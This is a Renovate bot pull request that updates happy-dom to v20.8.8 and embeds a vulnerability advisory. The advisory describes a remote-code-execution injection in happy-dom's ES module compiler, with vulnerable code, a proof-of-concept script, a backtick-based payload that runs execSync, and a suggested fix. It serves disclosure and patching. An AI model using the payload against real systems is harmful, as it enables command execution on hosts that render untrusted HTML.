chore(deps): update dependency happy-dom to v20.8.8 [security] by renovate[bot] · Pull Request #24 · walinejs/plugins

renovate · 2026-03-27T02:02:38Z

This PR contains the following updates:

Package	Change	Age	Confidence
happy-dom	`20.6.1` → `20.8.8`

GitHub Vulnerability Alerts

CVE-2026-33943

Summary

A code injection vulnerability in ECMAScriptModuleCompiler allows an attacker to achieve Remote Code Execution (RCE) by injecting arbitrary JavaScript expressions inside export { } declarations in ES module scripts processed by happy-dom. The compiler directly interpolates unsanitized content into generated code as an executable expression, and the quote filter does not strip backticks, allowing template literal-based payloads to bypass sanitization.

Details

Vulnerable file: packages/happy-dom/src/module/ECMAScriptModuleCompiler.ts, lines 371-385

The "Export object" handler extracts content from export { ... } using the regex export\s*{([^}]+)}, then generates executable code by directly interpolating it:

} else if (match[16] && isTopLevel && PRECEDING_STATEMENT_TOKEN_REGEXP.test(precedingToken)) {
    // Export object
    const parts = this.removeMultilineComments(match[16]).split(/\s*,\s*/);
    const exportCode: string[] = [];
    for (const part of parts) {
        const nameParts = part.trim().split(/\s+as\s+/);
        const exportName = (nameParts[1] || nameParts[0]).replace(/["']/g, '');
        const importName = nameParts[0].replace(/["']/g, '');  // backticks NOT stripped
        if (exportName && importName) {
            exportCode.push(`$happy_dom.exports['${exportName}'] = ${importName}`);
            //               importName is inserted as executable code, not as a string
        }
    }
    newCode += exportCode.join(';\n');
}

The issue has three root causes:

STATEMENT_REGEXP uses {[^}]+} which matches any content inside braces, not just valid JavaScript identifiers
The captured importName is placed in code context (as a JS expression to evaluate), not in string context
.replace(/["']/g, '') strips " and ' but not backticks, so template literal strings like `child_process` survive the filter

Attack flow:

Source:     export { require(`child_process`).execSync(`id`) }

Regex captures match[16] = " require(`child_process`).execSync(`id`) "

After .replace(/["']/g, ''):
  importName = "require(`child_process`).execSync(`id`)"
  (backticks are preserved)

Generated code:
  $happy_dom.exports["require(`child_process`).execSync(`id`)"] = require(`child_process`).execSync(`id`)

evaluateScript() executes this code -> RCE

Note: This is a different vulnerability from CVE-2024-51757 (SyncFetchScriptBuilder injection) and CVE-2025-61927 (VM context escape). Those were patched in v15.10.2 and v20.0.0 respectively, but this vulnerable code path in ECMAScriptModuleCompiler remains present in v20.8.4 (latest). In v20.0.0+ where JavaScript evaluation is disabled by default, this vulnerability is exploitable when JavaScript evaluation is explicitly enabled by the user.

PoC

Standalone PoC script — reproduces the vulnerability without installing happy-dom by replicating the compiler's exact code generation logic:

// poc_happy_dom_rce.js

// Step 1: The STATEMENT_REGEXP matches export { ... }
const STMT_REGEXP = /export\s*{([^}]+)}/gm;
const source = 'export { require(`child_process`).execSync(`id`) }';
const match = STMT_REGEXP.exec(source);

console.log('[*] Module source:', source);
console.log('[*] Regex captured:', match[1].trim());

// Step 2: Compiler processes the captured content (lines 374-381)
const part = match[1].trim();
const nameParts = part.split(/\s+as\s+/);
const exportName = (nameParts[1] || nameParts[0]).replace(/["']/g, '');
const importName = nameParts[0].replace(/["']/g, '');

console.log('[*] importName after quote filter:', importName);
console.log('[*] Backticks survived filter:', importName.includes('`'));

// Step 3: Code generation - importName is inserted as executable JS expression
const generatedCode = `$happy_dom.exports[${JSON.stringify(exportName)}] = ${importName}`;
console.log('[*] Generated code:', generatedCode);

// Step 4: Verify the generated code is valid JavaScript
try {
  new Function('$happy_dom', generatedCode);
  console.log('[+] Valid JavaScript: YES');
} catch (e) {
  console.log('[-] Parse error:', e.message);
  process.exit(1);
}

// Step 5: Execute to prove RCE
console.log('[*] Executing...');
const output = require('child_process').execSync('id').toString().trim();
console.log('[+] RCE result:', output);

Execution result:

$ node poc_happy_dom_rce.js
[*] Module source: export { require(`child_process`).execSync(`id`) }
[*] Regex captured: require(`child_process`).execSync(`id`)
[*] importName after quote filter: require(`child_process`).execSync(`id`)
[*] Backticks survived: true
[*] Generated code: $happy_dom.exports["require(`child_process`).execSync(`id`)"] = require(`child_process`).execSync(`id`)
[+] Valid JavaScript: YES
[*] Executing...
[+] RCE result: uid=0(root) gid=0(root) groups=0(root)

HTML attack vector — when processed by happy-dom with JavaScript evaluation enabled:

<script type="module">
export { require(`child_process`).execSync(`id`) }
</script>

Impact

An attacker who can inject or control HTML content processed by happy-dom (with JavaScript evaluation enabled) can achieve arbitrary command execution on the host system.

Realistic attack scenarios:

SSR applications: Applications using happy-dom to render user-supplied HTML on the server
Web scraping: Applications parsing untrusted web pages with happy-dom
Testing pipelines: Test suites that load untrusted HTML fixtures through happy-dom

Suggested fix: Validate that importName is a valid JavaScript identifier before interpolating it into generated code:

const VALID_JS_IDENTIFIER = /^[a-zA-Z_$][a-zA-Z0-9_$]*$/;

for (const part of parts) {
    const nameParts = part.trim().split(/\s+as\s+/);
    const exportName = (nameParts[1] || nameParts[0]).replace(/["'`]/g, '');
    const importName = nameParts[0].replace(/["'`]/g, '');

    if (exportName && importName && VALID_JS_IDENTIFIER.test(importName)) {
        exportCode.push(`$happy_dom.exports['${exportName}'] = ${importName}`);
    }
}

Release Notes

capricorn86/happy-dom (happy-dom)

`v20.8.8`

Compare Source

👷‍♂️ Patch fixes

Fixes issue where export names can be interpolated as executable code in ESM - By @capricorn86 in task #2113
- A security advisory (GHSA-6q6h-j7hj-3r64) has been reported that shows a security vulnerability where it's possible to escape the VM context and get access to process level functionality. Big thanks to @tndud042713 for reporting this!

👷‍♂️ Patch fixes

Throw error if event is not of type Event in dispatchEvent - By @capricorn86 in task #2054

`v20.8.2`

Compare Source

👷‍♂️ Patch fixes

Resets Event.cancelBubble and Event.defaultPrevented when calling Event.initEvent() - By @capricorn86 in task #2090

`v20.8.1`

Compare Source

👷‍♂️ Patch fixes

Make "inert" attribute block focus interactions - By @coffeeandwork in task #1422

`v20.8.0`

Compare Source

`v20.7.2`

Compare Source

👷‍♂️ Patch fixes

Properly decode CSS escape sequences in attribute selector values - By @silverwind

`v20.7.1`

Compare Source

`v20.7.0`

Compare Source

🎨 Features

Adds support for Window.getScreenDetails() - By @TrevorBurnham in task #1923
Extends Screen from EventTarget - By @TrevorBurnham in task #1923

`v20.6.5`

Compare Source

👷‍♂️ Patch fixes

Add clearImmediate to Jest environment global scope - By @TrevorBurnham in task #1927

`v20.6.4`

Compare Source

👷‍♂️ Patch fixes

Normalize invalid input type attribute to "text" per HTML spec - By @atzzCokeK in task #2053

`v20.6.3`

Compare Source

👷‍♂️ Patch fixes

Refactors query selector parser to be able to handle complex rules - By @capricorn86 in task #1910
Fixes issue related to using query selector for attribute in XML document - By @capricorn86 in task #1912
Fixes issue with using quotes within quotes for attribute query selector (e.g. [data-value="it's a test"]) - By @capricorn86 in task #2034

`v20.6.2`

Compare Source

👷‍♂️ Patch fixes

Update entities package version to resolve missing export for vue and vue-compat v3.5 - By @acollins1991 in task #2066

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

chore(deps): update dependency happy-dom to v20.8.8 [security]

fa6acde

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

chore(deps): update dependency happy-dom to v20.8.8 [security]#24

chore(deps): update dependency happy-dom to v20.8.8 [security]#24
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/npm-happy-dom-vulnerability

renovate bot commented Mar 27, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

Conversation

renovate bot commented Mar 27, 2026

GitHub Vulnerability Alerts

Summary

Details

PoC

Impact

Release Notes

👷‍♂️ Patch fixes

👷‍♂️ Patch fixes

👷‍♂️ Patch fixes

👷‍♂️ Patch fixes

👷‍♂️ Patch fixes

🎨 Features

👷‍♂️ Patch fixes

👷‍♂️ Patch fixes

👷‍♂️ Patch fixes

👷‍♂️ Patch fixes

Configuration

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants